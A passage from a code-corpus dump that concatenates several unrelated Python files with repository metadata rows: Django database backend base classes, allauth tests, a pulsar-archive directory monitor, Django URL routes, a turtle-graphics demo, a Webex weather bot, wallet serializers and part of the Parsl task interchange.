def value_to_db_date(self, value):
"""
Transform a date value to an object compatible with what is expected
by the backend driver for date columns.
"""
if value is None:
return None
return six.text_type(value)
def value_to_db_datetime(self, value):
"""
Transform a datetime value to an object compatible with what is expected
by the backend driver for datetime columns.
"""
if value is None:
return None
return six.text_type(value)
def value_to_db_time(self, value):
"""
Transform a time value to an object compatible with what is expected
by the backend driver for time columns.
"""
if value is None:
return None
if timezone.is_aware(value):
raise ValueError("Django does not support timezone-aware times.")
return six.text_type(value)
def value_to_db_decimal(self, value, max_digits, decimal_places):
"""
Transform a decimal.Decimal value to an object compatible with what is
expected by the backend driver for decimal (numeric) columns.
"""
if value is None:
return None
return utils.format_number(value, max_digits, decimal_places)
def year_lookup_bounds_for_date_field(self, value):
"""
        Returns a two-element list with the lower and upper bound to be used
with a BETWEEN operator to query a DateField value using a year
lookup.
`value` is an int, containing the looked-up year.
"""
first = datetime.date(value, 1, 1)
second = datetime.date(value, 12, 31)
return [first, second]
def year_lookup_bounds_for_datetime_field(self, value):
"""
        Returns a two-element list with the lower and upper bound to be used
with a BETWEEN operator to query a DateTimeField value using a year
lookup.
`value` is an int, containing the looked-up year.
"""
first = datetime.datetime(value, 1, 1)
second = datetime.datetime(value, 12, 31, 23, 59, 59, 999999)
if settings.USE_TZ:
tz = timezone.get_current_timezone()
first = timezone.make_aware(first, tz)
second = timezone.make_aware(second, tz)
return [first, second]
def convert_values(self, value, field):
"""
Coerce the value returned by the database backend into a consistent type
that is compatible with the field type.
"""
if value is None or field is None:
return value
internal_type = field.get_internal_type()
if internal_type == 'FloatField':
return float(value)
elif (internal_type and (internal_type.endswith('IntegerField')
or internal_type == 'AutoField')):
return int(value)
return value
def check_aggregate_support(self, aggregate_func):
"""Check that the backend supports the provided aggregate
This is used on specific backends to rule out known aggregates
that are known to have faulty implementations. If the named
aggregate function has a known problem, the backend should
raise NotImplementedError.
"""
pass
def combine_expression(self, connector, sub_expressions):
"""Combine a list of subexpressions into a single expression, using
the provided connecting operator. This is required because operators
can vary between backends (e.g., Oracle with %% and &) and between
subexpression types (e.g., date expressions)
"""
conn = ' %s ' % connector
return conn.join(sub_expressions)
def modify_insert_params(self, placeholders, params):
"""Allow modification of insert parameters. Needed for Oracle Spatial
backend due to #10888.
"""
return params
# Structure returned by the DB-API cursor.description interface (PEP 249)
FieldInfo = namedtuple('FieldInfo',
'name type_code display_size internal_size precision scale null_ok')
class BaseDatabaseIntrospection(object):
"""
This class encapsulates all backend-specific introspection utilities
"""
data_types_reverse = {}
def __init__(self, connection):
self.connection = connection
def get_field_type(self, data_type, description):
"""Hook for a database backend to use the cursor description to
match a Django field type to a database column.
For Oracle, the column data_type on its own is insufficient to
distinguish between a FloatField and IntegerField, for example."""
return self.data_types_reverse[data_type]
def table_name_converter(self, name):
"""Apply a conversion to the name for the purposes of comparison.
The default table name converter is for case sensitive comparison.
"""
return name
def table_names(self, cursor=None):
"""
Returns a list of names of all tables that exist in the database.
The returned table list is sorted by Python's default sorting. We
        do NOT use the database's ORDER BY here to avoid subtle differences
in sorting order between databases.
"""
if cursor is None:
cursor = self.connection.cursor()
return sorted(self.get_table_list(cursor))
def get_table_list(self, cursor):
"""
Returns an unsorted list of names of all tables that exist in the
database.
"""
raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_table_list() method')
def django_table_names(self, only_existing=False):
"""
Returns a list of all table names that have associated Django models and
are in INSTALLED_APPS.
If only_existing is True, the resulting list will only include the tables
that actually exist in the database.
"""
from django.apps import apps
from django.db import router
tables = set()
for app_config in apps.get_app_configs(only_with_models_module=True):
for model in router.get_migratable_models(app_config.models_module, self.connection.alias):
if not model._meta.managed:
continue
tables.add(model._meta.db_table)
tables.update(f.m2m_db_table() for f in model._meta.local_many_to_many)
tables = list(tables)
if only_existing:
existing_tables = self.table_names()
tables = [
t
for t in tables
if self.table_name_converter(t) in existing_tables
]
return tables
def installed_models(self, tables):
"Returns a set of all models represented by the provided list of table names."
from django.apps import apps
from django.db import router
all_models = []
for app_config in apps.get_app_configs(only_with_models_module=True):
all_models.extend(router.get_migratable_models(app_config.models_module, self.connection.alias))
tables = list(map(self.table_name_converter, tables))
return set([
m for m in all_models
if self.table_name_converter(m._meta.db_table) in tables
])
def sequence_list(self):
"Returns a list of information about all DB sequences for all models in all apps."
from django.apps import apps
from django.db import models, router
sequence_list = []
for app_config in apps.get_app_configs(only_with_models_module=True):
for model in router.get_migratable_models(app_config.models_module, self.connection.alias):
if not model._meta.managed:
continue
if model._meta.swapped:
continue
for f in model._meta.local_fields:
if isinstance(f, models.AutoField):
sequence_list.append({'table': model._meta.db_table, 'column': f.column})
break # Only one AutoField is allowed per model, so don't bother continuing.
for f in model._meta.local_many_to_many:
# If this is an m2m using an intermediate table,
# we don't need to reset the sequence.
if f.rel.through is None:
sequence_list.append({'table': f.m2m_db_table(), 'column': None})
return sequence_list
def get_key_columns(self, cursor, table_name):
"""
Backends can override this to return a list of (column_name, referenced_table_name,
referenced_column_name) for all key columns in given table.
"""
raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_key_columns() method')
def get_primary_key_column(self, cursor, table_name):
"""
Returns the name of the primary key column for the given table.
"""
for column in six.iteritems(self.get_indexes(cursor, table_name)):
if column[1]['primary_key']:
return column[0]
return None
def get_indexes(self, cursor, table_name):
"""
Returns a dictionary of indexed fieldname -> infodict for the given
table, where each infodict is in the format:
{'primary_key': boolean representing whether it's the primary key,
'unique': boolean representing whether it's a unique index}
Only single-column indexes are introspected.
"""
raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_indexes() method')
def get_constraints(self, cursor, table_name):
"""
Retrieves any constraints or keys (unique, pk, fk, check, index)
across one or more columns.
Returns a dict mapping constraint names to their attributes,
where attributes is a dict with keys:
* columns: List of columns this covers
* primary_key: True if primary key, False otherwise
* unique: True if this is a unique constraint, False otherwise
* foreign_key: (table, column) of target, or None
* check: True if check constraint, False otherwise
* index: True if index, False otherwise.
Some backends may return special constraint names that don't exist
if they don't name constraints of a certain type (e.g. SQLite)
"""
raise NotImplementedError('subclasses of BaseDatabaseIntrospection may require a get_constraints() method')
class BaseDatabaseClient(object):
"""
This class encapsulates all backend-specific methods for opening a
client shell.
"""
# This should be a string representing the name of the executable
# (e.g., "psql"). Subclasses must override this.
executable_name = None
def __init__(self, connection):
# connection is an instance of BaseDatabaseWrapper.
self.connection = connection
def runshell(self):
raise NotImplementedError('subclasses of BaseDatabaseClient must provide a runshell() method')
class BaseDatabaseValidation(object):
"""
    This class encapsulates all backend-specific model validation.
"""
def __init__(self, connection):
self.connection = connection
def validate_field(self, errors, opts, f):
"By default, there is no backend-specific validation"
pass
| 36.779045 | 129 | 0.651383 |
8f108b56cdc4b1e2a6586461ef2e4f26ccacb6b7 | 627 | py | Python | allauth/tests.py | k1000/django-allauth | e67b05fde5635f19850de73558987573c085826f | [
"MIT"
] | 1 | 2015-11-05T15:17:10.000Z | 2015-11-05T15:17:10.000Z | allauth/tests.py | k1000/django-allauth | e67b05fde5635f19850de73558987573c085826f | [
"MIT"
] | null | null | null | allauth/tests.py | k1000/django-allauth | e67b05fde5635f19850de73558987573c085826f | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.core.urlresolvers import reverse
import utils
class BasicTests(TestCase):
def test_email_validation(self):
s = 'unfortunately.django.user.email.max_length.is.set.to.75.which.is.too.short@bummer.com'
self.assertEquals(None, utils.valid_email_or_none(s))
s = 'this.email.address.is.a.bit.too.long.but.should.still.validate.ok@short.com'
self.assertEquals(s, utils.valid_email_or_none(s))
s = 'x'+s
self.assertEquals(None, utils.valid_email_or_none(s))
self.assertEquals(None, utils.valid_email_or_none("Bad ?"))
| 36.882353 | 99 | 0.709729 |
c18ade9fa815f2e610855f467d72c76ccae53bfd | 3,707 | py | Python | scripts/archive_directory_monitor.py | steve-ord/psrchive-docker | 4d7e1150f2f5af541242b7977ef4654b7623293e | [
"MIT"
] | null | null | null | scripts/archive_directory_monitor.py | steve-ord/psrchive-docker | 4d7e1150f2f5af541242b7977ef4654b7623293e | [
"MIT"
] | null | null | null | scripts/archive_directory_monitor.py | steve-ord/psrchive-docker | 4d7e1150f2f5af541242b7977ef4654b7623293e | [
"MIT"
] | null | null | null | import logging
import signal
import sys
import shlex
import shutil
import os
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from subprocess import Popen, PIPE
log = logging.getLogger("archive_directory_monitor")
class ArchiveAdder(FileSystemEventHandler):
def __init__(self,output_dir):
super(ArchiveAdder,self).__init__()
self.output_dir = output_dir
self.first_file = True
def _syscall(self,cmd):
log.debug("Calling: {}".format(cmd))
proc = Popen(shlex.split(cmd),stdout=PIPE,stderr=PIPE)
proc.wait()
if proc.returncode != 0:
log.error(proc.stderr.read())
else:
log.debug("Call success")
def fscrunch(self,fname):
self._syscall("pam -F -e fscrunch {}".format(fname))
return fname.replace(".ar",".fscrunch")
def process(self,fname):
fscrunch_fname = self.fscrunch(fname)
if self.first_file:
log.debug("First file in set. Copying to sum.?scrunch.")
shutil.copy2(fscrunch_fname,"sum.fscrunch")
shutil.copy2(fname,"sum.tscrunch")
self.first_file = False
else:
self._syscall("psradd -T -inplace sum.tscrunch {}".format(fname))
self._syscall("psradd -inplace sum.fscrunch {}".format(fscrunch_fname))
os.remove(fscrunch_fname)
shutil.copy2("sum.fscrunch",self.output_dir)
shutil.copy2("sum.tscrunch",self.output_dir)
def on_created(self, event):
log.debug("New file created: {}".format(event.src_path))
try:
fname = event.src_path
if fname.endswith(".ar"):
log.debug("Passing archive file for processing")
self.process(fname)
except Exception as error:
log.error(error)
def main(input_dir,output_dir,handler):
observer = Observer()
observer.daemon = False
log.debug("Input directory: {}".format(input_dir))
log.debug("Output directory: {}".format(output_dir))
log.debug("Setting up ArchiveAdder handler")
observer.schedule(handler, input_dir, recursive=False)
def shutdown(sig,func):
log.debug("Signal handler called on signal: {}".format(sig))
observer.stop()
observer.join()
sys.exit()
log.debug("Setting SIGTERM and SIGINT handler")
signal.signal(signal.SIGTERM,shutdown)
signal.signal(signal.SIGINT,shutdown)
log.debug("Starting directory monitor")
observer.start()
log.debug("Parent thread entering 1 second polling loop")
while not observer.stopped_event.wait(1):
pass
if __name__ == "__main__":
from argparse import ArgumentParser
FORMAT = "[ %(levelname)s - %(asctime)s - %(filename)s:%(lineno)s] %(message)s"
logger = logging.getLogger('archive_directory_monitor')
logging.basicConfig(format=FORMAT)
logger.setLevel(logging.DEBUG)
usage = "usage: {prog} [options]".format(prog=sys.argv[0])
parser = ArgumentParser(usage=usage)
parser.add_argument("-i","--input_dir",type=str,
help="The directory to monitor for new files",
required=True)
parser.add_argument("-o","--output_dir",type=str,
help="The directory to output results to",
required=True)
parser.add_argument("-m","--mode",type=str,
help="Processing mode to operate in",
default="ArchiveAdder")
args = parser.parse_args()
if args.mode == "ArchiveAdder":
handler = ArchiveAdder(args.output_dir)
else:
log.error("Processing mode {} is not supported.".format(args.mode))
sys.exit(-1)
main(args.input_dir,args.output_dir,handler)
| 34.009174 | 83 | 0.650661 |
94ca0f21cfa0c822072a772ee71d7b4d43649124 | 445 | py | Python | demo_path_routing_auth/urls.py | mccalluc/django_docker_engine | 2f8241ef9b504e89de54bb5f18ef3c925adea116 | [
"MIT"
] | 7 | 2017-04-25T10:22:53.000Z | 2021-09-11T10:18:04.000Z | demo_path_routing_auth/urls.py | django-africa/django_docker_engine | 2f8241ef9b504e89de54bb5f18ef3c925adea116 | [
"MIT"
] | 117 | 2017-03-22T19:24:24.000Z | 2021-03-25T21:57:53.000Z | demo_path_routing_auth/urls.py | mccalluc/django_docker_engine | 2f8241ef9b504e89de54bb5f18ef3c925adea116 | [
"MIT"
] | 3 | 2018-05-23T10:00:06.000Z | 2020-03-05T05:56:02.000Z | from django.conf.urls import include, url
from . import views
urlpatterns = [
url(r'^$', views.index),
url(r'^login/$', views.login),
url(r'^logout/$', views.logout),
url(r'^launch/$', views.launch),
url(r'^kill/(.*)$', views.kill),
url(r'^logs/(.*)$', views.logs),
url(r'^history/(.*)$', views.history),
url(r'^upload/(.*)$', views.upload),
url(r'^docker/', include(__package__ + '.proxy_url_patterns'))
]
| 27.8125 | 66 | 0.582022 |
194220590a21afb901acec0403ece7cae9bdce0c | 738 | py | Python | examples/introduction.to.programming.with.turtle/for_all/6-2-3.very.step.and.turn.py | strakam/PyEasyGraphics | 57a586aa92385d26725d4ec3d61b2bbbe970195d | [
"BSD-3-Clause"
] | 5 | 2019-09-23T05:15:47.000Z | 2021-01-17T08:06:47.000Z | examples/introduction.to.programming.with.turtle/for_all/6-2-3.very.step.and.turn.py | strakam/PyEasyGraphics | 57a586aa92385d26725d4ec3d61b2bbbe970195d | [
"BSD-3-Clause"
] | 3 | 2019-05-03T05:25:17.000Z | 2021-04-15T04:53:16.000Z | examples/introduction.to.programming.with.turtle/for_all/6-2-3.very.step.and.turn.py | strakam/PyEasyGraphics | 57a586aa92385d26725d4ec3d61b2bbbe970195d | [
"BSD-3-Clause"
] | 4 | 2019-05-04T13:42:40.000Z | 2021-04-15T10:38:48.000Z | from easygraphics.turtle import *
from easygraphics import *
import math
import sys
def distance(x1, y1, x2, y2):
dx = x2 - x1
dy = y2 - y1
return math.hypot(dx, dy)
def factor(x, y):
    # Returns 1 / distance to the point (x, y), capped at 1 inside one unit.
    d = distance(get_x(), get_y(), x, y)
    if d < 1:
        return 1
    return 1 / d
def vary_step(x, y, side, angle):
    # Fixed turn angle; the step length varies inversely with distance to (x, y).
    while is_run():
        fd(factor(x, y) * side)
        lt(angle)
def vary_turn(x, y, side, angle):
    # Fixed step length; the turn angle varies inversely with distance to (x, y).
    while is_run():
        fd(side)
        lt(factor(x, y) * angle)
def main():
create_world(1024, 768)
set_speed(100)
setxy(100, 100)
set_fill_color("red")
fill_circle(0, 0, 4)
# vary_step(0,0,1500,10)
vary_turn(0, 0, 10, 2000)
pause()
close_world()
easy_run(main) | 17.162791 | 40 | 0.571816 |
2b86755125eb1c2790d65966028982cb59146379 | 1,973 | py | Python | simple-webex-chatbot/weather.py | 0x2142/example-scripts | 1db386d0eb1af89d9b7da8fe667d9b5526b3001c | [
"Unlicense"
] | 2 | 2020-11-09T20:04:08.000Z | 2021-04-08T09:39:56.000Z | simple-webex-chatbot/weather.py | 0x2142/example-scripts | 1db386d0eb1af89d9b7da8fe667d9b5526b3001c | [
"Unlicense"
] | 1 | 2022-02-06T02:53:42.000Z | 2022-02-07T18:52:26.000Z | simple-webex-chatbot/weather.py | 0x2142/example-scripts | 1db386d0eb1af89d9b7da8fe667d9b5526b3001c | [
"Unlicense"
] | 3 | 2021-02-25T08:31:08.000Z | 2022-03-24T14:54:36.000Z | import json
import logging
import requests
from webex_bot.models.command import Command
log = logging.getLogger(__name__)
# Get a free account at openweathermap.org &
# insert API key here:
OPENWEATHER_KEY = ""
class WeatherByZIP(Command):
def __init__(self):
# Define custom command info here
# command_keyword = what chat keyword will trigger this command to execute
# help_message = what message is returned when user sends 'help' message
# card = optionally send an AdaptiveCard response
super().__init__(
command_keyword="weather",
help_message="Get current weather conditions by ZIP code.",
card=None,
)
def execute(self, message, attachment_actions):
# By default, command keyword will be stripped out before being passed to execute function
# For example, If user sends "weather 12345", then message variable will be " 12345"
# Need to strip the additional whitespace around the input:
zip_code = message.strip()
# Define our URL, with desired parameters: ZIP code, units, and API Key
url = "https://api.openweathermap.org/data/2.5/weather?"
url += f"zip={zip_code}&units=imperial&appid={OPENWEATHER_KEY}"
# Query weather
response = requests.get(url)
weather = response.json()
# Pull out desired info
city = weather["name"]
conditions = weather["weather"][0]["description"]
temperature = weather["main"]["temp"]
humidity = weather["main"]["humidity"]
wind = weather["wind"]["speed"]
# Format message that will be sent back to the user
response_message = (
f"In {city}, it's currently {temperature}F with {conditions}. "
)
response_message += f"Wind speed is {wind}mph. Humidity is {humidity}%"
# Message returned will be sent back to the user by bot
return response_message
| 35.872727 | 98 | 0.650786 |
4225a8def7e48178f959f1b2f13994c352736683 | 875 | py | Python | backend/wallet/api/v1/serializers.py | crowdbotics-apps/test-30107 | c9c9e1338ac2fd286bead4b401144755699217c5 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | backend/wallet/api/v1/serializers.py | crowdbotics-apps/test-30107 | c9c9e1338ac2fd286bead4b401144755699217c5 | [
"FTL",
"AML",
"RSA-MD"
] | 15 | 2021-08-30T03:24:39.000Z | 2022-03-13T17:39:16.000Z | backend/wallet/api/v1/serializers.py | crowdbotics-apps/test-30107 | c9c9e1338ac2fd286bead4b401144755699217c5 | [
"FTL",
"AML",
"RSA-MD"
] | null | null | null | from rest_framework import serializers
from wallet.models import (
PaymentTransaction,
TaskerPaymentAccount,
TaskerWallet,
PaymentMethod,
CustomerWallet,
)
class TaskerPaymentAccountSerializer(serializers.ModelSerializer):
class Meta:
model = TaskerPaymentAccount
fields = "__all__"
class TaskerWalletSerializer(serializers.ModelSerializer):
class Meta:
model = TaskerWallet
fields = "__all__"
class PaymentTransactionSerializer(serializers.ModelSerializer):
class Meta:
model = PaymentTransaction
fields = "__all__"
class CustomerWalletSerializer(serializers.ModelSerializer):
class Meta:
model = CustomerWallet
fields = "__all__"
class PaymentMethodSerializer(serializers.ModelSerializer):
class Meta:
model = PaymentMethod
fields = "__all__"
| 22.435897 | 66 | 0.717714 |
d181d018bf69ddc1d5572f803685a599400f01bf | 29,861 | py | Python | parsl/executors/high_throughput/interchange.py | jmoon1506/parsl | f4070799a07f314b09b255689972534059fc746e | [
"Apache-2.0"
] | null | null | null | parsl/executors/high_throughput/interchange.py | jmoon1506/parsl | f4070799a07f314b09b255689972534059fc746e | [
"Apache-2.0"
] | null | null | null | parsl/executors/high_throughput/interchange.py | jmoon1506/parsl | f4070799a07f314b09b255689972534059fc746e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import argparse
import zmq
import os
import sys
import platform
import random
import time
import datetime
import pickle
import logging
import queue
import threading
import json
from parsl.version import VERSION as PARSL_VERSION
from parsl.serialize import ParslSerializer
serialize_object = ParslSerializer().serialize
from parsl.app.errors import RemoteExceptionWrapper
from parsl.monitoring.message_type import MessageType
from parsl.process_loggers import wrap_with_logs
HEARTBEAT_CODE = (2 ** 32) - 1
PKL_HEARTBEAT_CODE = pickle.dumps((2 ** 32) - 1)
class ShutdownRequest(Exception):
''' Exception raised when any async component receives a ShutdownRequest
'''
def __init__(self):
self.tstamp = time.time()
def __repr__(self):
return "Shutdown request received at {}".format(self.tstamp)
def __str__(self):
return self.__repr__()
class ManagerLost(Exception):
''' Task lost due to manager loss. Manager is considered lost when multiple heartbeats
have been missed.
'''
def __init__(self, manager_id, hostname):
self.manager_id = manager_id
self.tstamp = time.time()
self.hostname = hostname
def __repr__(self):
return "Task failure due to loss of manager {} on host {}".format(self.manager_id.decode(), self.hostname)
def __str__(self):
return self.__repr__()
class BadRegistration(Exception):
''' A new Manager tried to join the executor with a BadRegistration message
'''
def __init__(self, worker_id, critical=False):
self.worker_id = worker_id
self.tstamp = time.time()
self.handled = "critical" if critical else "suppressed"
def __repr__(self):
return "Manager {} attempted to register with a bad registration message. Caused a {} failure".format(
self.worker_id,
self.handled)
def __str__(self):
return self.__repr__()
class VersionMismatch(Exception):
''' Manager and Interchange versions do not match
'''
def __init__(self, interchange_version, manager_version):
self.interchange_version = interchange_version
self.manager_version = manager_version
def __repr__(self):
return "Manager version info {} does not match interchange version info {}, causing a critical failure".format(
self.interchange_version,
self.manager_version)
def __str__(self):
return self.__repr__()
class Interchange(object):
""" Interchange is a task orchestrator for distributed systems.
1. Asynchronously queue large volume of tasks (>100K)
2. Allow for workers to join and leave the union
3. Detect workers that have failed using heartbeats
4. Service single and batch requests from workers
5. Be aware of requests worker resource capacity,
eg. schedule only jobs that fit into walltime.
TODO: We most likely need a PUB channel to send out global commands, like shutdown
"""
def __init__(self,
client_address="127.0.0.1",
interchange_address="127.0.0.1",
client_ports=(50055, 50056, 50057),
worker_ports=None,
worker_port_range=(54000, 55000),
hub_address=None,
hub_port=None,
heartbeat_threshold=60,
logdir=".",
logging_level=logging.INFO,
poll_period=10,
):
"""
Parameters
----------
client_address : str
The ip address at which the parsl client can be reached. Default: "127.0.0.1"
interchange_address : str
The ip address at which the workers will be able to reach the Interchange. Default: "127.0.0.1"
client_ports : triple(int, int, int)
The ports at which the client can be reached
worker_ports : tuple(int, int)
The specific two ports at which workers will connect to the Interchange. Default: None
worker_port_range : tuple(int, int)
The interchange picks ports at random from the range which will be used by workers.
This is overridden when the worker_ports option is set. Default: (54000, 55000)
hub_address : str
The ip address at which the interchange can send info about managers to when monitoring is enabled.
This is passed via dfk and executor automatically. Default: None (meaning monitoring disabled)
hub_port : str
The port at which the interchange can send info about managers to when monitoring is enabled.
This is passed via dfk and executor automatically. Default: None (meaning monitoring disabled)
heartbeat_threshold : int
Number of seconds since the last heartbeat after which worker is considered lost.
logdir : str
Parsl log directory paths. Logs and temp files go here. Default: '.'
logging_level : int
Logging level as defined in the logging module. Default: logging.INFO (20)
poll_period : int
The main thread polling period, in milliseconds. Default: 10ms
"""
self.logdir = logdir
os.makedirs(self.logdir, exist_ok=True)
start_file_logger("{}/interchange.log".format(self.logdir), level=logging_level)
logger.debug("Initializing Interchange process")
self.client_address = client_address
self.interchange_address = interchange_address
self.poll_period = poll_period
logger.info("Attempting connection to client at {} on ports: {},{},{}".format(
client_address, client_ports[0], client_ports[1], client_ports[2]))
self.context = zmq.Context()
self.task_incoming = self.context.socket(zmq.DEALER)
self.task_incoming.set_hwm(0)
self.task_incoming.RCVTIMEO = 10 # in milliseconds
self.task_incoming.connect("tcp://{}:{}".format(client_address, client_ports[0]))
self.results_outgoing = self.context.socket(zmq.DEALER)
self.results_outgoing.set_hwm(0)
self.results_outgoing.connect("tcp://{}:{}".format(client_address, client_ports[1]))
self.command_channel = self.context.socket(zmq.REP)
self.command_channel.RCVTIMEO = 1000 # in milliseconds
self.command_channel.connect("tcp://{}:{}".format(client_address, client_ports[2]))
logger.info("Connected to client")
self.hub_address = hub_address
self.hub_port = hub_port
self.pending_task_queue = queue.Queue(maxsize=10 ** 6)
self.worker_ports = worker_ports
self.worker_port_range = worker_port_range
self.task_outgoing = self.context.socket(zmq.ROUTER)
self.task_outgoing.set_hwm(0)
self.results_incoming = self.context.socket(zmq.ROUTER)
self.results_incoming.set_hwm(0)
if self.worker_ports:
self.worker_task_port = self.worker_ports[0]
self.worker_result_port = self.worker_ports[1]
self.task_outgoing.bind("tcp://*:{}".format(self.worker_task_port))
self.results_incoming.bind("tcp://*:{}".format(self.worker_result_port))
else:
self.worker_task_port = self.task_outgoing.bind_to_random_port('tcp://*',
min_port=worker_port_range[0],
max_port=worker_port_range[1], max_tries=100)
self.worker_result_port = self.results_incoming.bind_to_random_port('tcp://*',
min_port=worker_port_range[0],
max_port=worker_port_range[1], max_tries=100)
logger.info("Bound to ports {},{} for incoming worker connections".format(
self.worker_task_port, self.worker_result_port))
self._ready_manager_queue = {}
self.heartbeat_threshold = heartbeat_threshold
self.current_platform = {'parsl_v': PARSL_VERSION,
'python_v': "{}.{}.{}".format(sys.version_info.major,
sys.version_info.minor,
sys.version_info.micro),
'os': platform.system(),
'hostname': platform.node(),
'dir': os.getcwd()}
logger.info("Platform info: {}".format(self.current_platform))
def get_tasks(self, count):
""" Obtains a batch of tasks from the internal pending_task_queue
Parameters
----------
count: int
Count of tasks to get from the queue
Returns
-------
List of upto count tasks. May return fewer than count down to an empty list
eg. [{'task_id':<x>, 'buffer':<buf>} ... ]
"""
tasks = []
for i in range(0, count):
try:
x = self.pending_task_queue.get(block=False)
except queue.Empty:
break
else:
tasks.append(x)
return tasks
@wrap_with_logs(target="interchange")
def migrate_tasks_to_internal(self, kill_event):
"""Pull tasks from the incoming tasks 0mq pipe onto the internal
pending task queue
Parameters:
-----------
kill_event : threading.Event
Event to let the thread know when it is time to die.
"""
logger.info("[TASK_PULL_THREAD] Starting")
task_counter = 0
poller = zmq.Poller()
poller.register(self.task_incoming, zmq.POLLIN)
while not kill_event.is_set():
try:
msg = self.task_incoming.recv_pyobj()
except zmq.Again:
# We just timed out while attempting to receive
logger.debug("[TASK_PULL_THREAD] {} tasks in internal queue".format(self.pending_task_queue.qsize()))
continue
if msg == 'STOP':
kill_event.set()
break
else:
self.pending_task_queue.put(msg)
task_counter += 1
logger.debug("[TASK_PULL_THREAD] Fetched task:{}".format(task_counter))
def _create_monitoring_channel(self):
if self.hub_address and self.hub_port:
logger.info("Connecting to monitoring")
hub_channel = self.context.socket(zmq.DEALER)
hub_channel.set_hwm(0)
hub_channel.connect("tcp://{}:{}".format(self.hub_address, self.hub_port))
logger.info("Monitoring enabled and connected to hub")
return hub_channel
else:
return None
def _send_monitoring_info(self, hub_channel, manager):
if hub_channel:
logger.info("Sending message {} to hub".format(self._ready_manager_queue[manager]))
hub_channel.send_pyobj((MessageType.NODE_INFO,
datetime.datetime.now(),
self._ready_manager_queue[manager]))
@wrap_with_logs(target="interchange")
def _command_server(self, kill_event):
""" Command server to run async command to the interchange
"""
logger.debug("[COMMAND] Command Server Starting")
# Need to create a new ZMQ socket for command server thread
hub_channel = self._create_monitoring_channel()
while not kill_event.is_set():
try:
command_req = self.command_channel.recv_pyobj()
logger.debug("[COMMAND] Received command request: {}".format(command_req))
if command_req == "OUTSTANDING_C":
outstanding = self.pending_task_queue.qsize()
for manager in self._ready_manager_queue:
outstanding += len(self._ready_manager_queue[manager]['tasks'])
reply = outstanding
elif command_req == "WORKERS":
num_workers = 0
for manager in self._ready_manager_queue:
num_workers += self._ready_manager_queue[manager]['worker_count']
reply = num_workers
elif command_req == "MANAGERS":
reply = []
for manager in self._ready_manager_queue:
idle_duration = 0
if self._ready_manager_queue[manager]['idle_since'] is not None:
idle_duration = time.time() - self._ready_manager_queue[manager]['idle_since']
resp = {'manager': manager.decode('utf-8'),
'block_id': self._ready_manager_queue[manager]['block_id'],
'worker_count': self._ready_manager_queue[manager]['worker_count'],
'tasks': len(self._ready_manager_queue[manager]['tasks']),
'idle_duration': idle_duration,
'active': self._ready_manager_queue[manager]['active']}
reply.append(resp)
elif command_req.startswith("HOLD_WORKER"):
cmd, s_manager = command_req.split(';')
manager = s_manager.encode('utf-8')
logger.info("[CMD] Received HOLD_WORKER for {}".format(manager))
if manager in self._ready_manager_queue:
self._ready_manager_queue[manager]['active'] = False
reply = True
self._send_monitoring_info(hub_channel, manager)
else:
reply = False
elif command_req == "SHUTDOWN":
logger.info("[CMD] Received SHUTDOWN command")
kill_event.set()
reply = True
else:
reply = None
logger.debug("[COMMAND] Reply: {}".format(reply))
self.command_channel.send_pyobj(reply)
except zmq.Again:
logger.debug("[COMMAND] is alive")
continue
def start(self, poll_period=None):
""" Start the interchange
Parameters:
----------
TODO: Move task receiving to a thread
"""
logger.info("Incoming ports bound")
hub_channel = self._create_monitoring_channel()
if poll_period is None:
poll_period = self.poll_period
start = time.time()
count = 0
self._kill_event = threading.Event()
self._task_puller_thread = threading.Thread(target=self.migrate_tasks_to_internal,
args=(self._kill_event,),
name="Interchange-Task-Puller")
self._task_puller_thread.start()
self._command_thread = threading.Thread(target=self._command_server,
args=(self._kill_event,),
name="Interchange-Command")
self._command_thread.start()
poller = zmq.Poller()
# poller.register(self.task_incoming, zmq.POLLIN)
poller.register(self.task_outgoing, zmq.POLLIN)
poller.register(self.results_incoming, zmq.POLLIN)
# These are managers which we should examine in an iteration
# for scheduling a job (or maybe any other attention?).
# Anything altering the state of the manager should add it
# onto this list.
interesting_managers = set()
while not self._kill_event.is_set():
self.socks = dict(poller.poll(timeout=poll_period))
# Listen for requests for work
if self.task_outgoing in self.socks and self.socks[self.task_outgoing] == zmq.POLLIN:
logger.debug("[MAIN] starting task_outgoing section")
message = self.task_outgoing.recv_multipart()
manager = message[0]
if manager not in self._ready_manager_queue:
reg_flag = False
try:
msg = json.loads(message[1].decode('utf-8'))
msg['reg_time'] = datetime.datetime.strptime(msg['reg_time'], "%Y-%m-%d %H:%M:%S")
reg_flag = True
except Exception:
logger.warning("[MAIN] Got Exception reading registration message from manager: {}".format(
manager), exc_info=True)
logger.debug("[MAIN] Message :\n{}\n".format(message[0]))
else:
# We set up an entry only if registration works correctly
self._ready_manager_queue[manager] = {'last_heartbeat': time.time(),
'idle_since': time.time(),
'free_capacity': 0,
'block_id': None,
'max_capacity': 0,
'worker_count': 0,
'active': True,
'tasks': []}
if reg_flag is True:
interesting_managers.add(manager)
logger.info("[MAIN] Adding manager: {} to ready queue".format(manager))
self._ready_manager_queue[manager].update(msg)
logger.info("[MAIN] Registration info for manager {}: {}".format(manager, msg))
self._send_monitoring_info(hub_channel, manager)
if (msg['python_v'].rsplit(".", 1)[0] != self.current_platform['python_v'].rsplit(".", 1)[0] or
msg['parsl_v'] != self.current_platform['parsl_v']):
logger.warning("[MAIN] Manager {} has incompatible version info with the interchange".format(manager))
logger.debug("Setting kill event")
self._kill_event.set()
e = VersionMismatch("py.v={} parsl.v={}".format(self.current_platform['python_v'].rsplit(".", 1)[0],
self.current_platform['parsl_v']),
"py.v={} parsl.v={}".format(msg['python_v'].rsplit(".", 1)[0],
msg['parsl_v'])
)
result_package = {'task_id': -1, 'exception': serialize_object(e)}
pkl_package = pickle.dumps(result_package)
self.results_outgoing.send(pkl_package)
logger.warning("[MAIN] Sent failure reports, unregistering manager")
else:
logger.info("[MAIN] Manager {} has compatible Parsl version {}".format(manager, msg['parsl_v']))
logger.info("[MAIN] Manager {} has compatible Python version {}".format(manager,
msg['python_v'].rsplit(".", 1)[0]))
else:
# Registration has failed.
logger.debug("[MAIN] Suppressing bad registration from manager:{}".format(
manager))
else:
tasks_requested = int.from_bytes(message[1], "little")
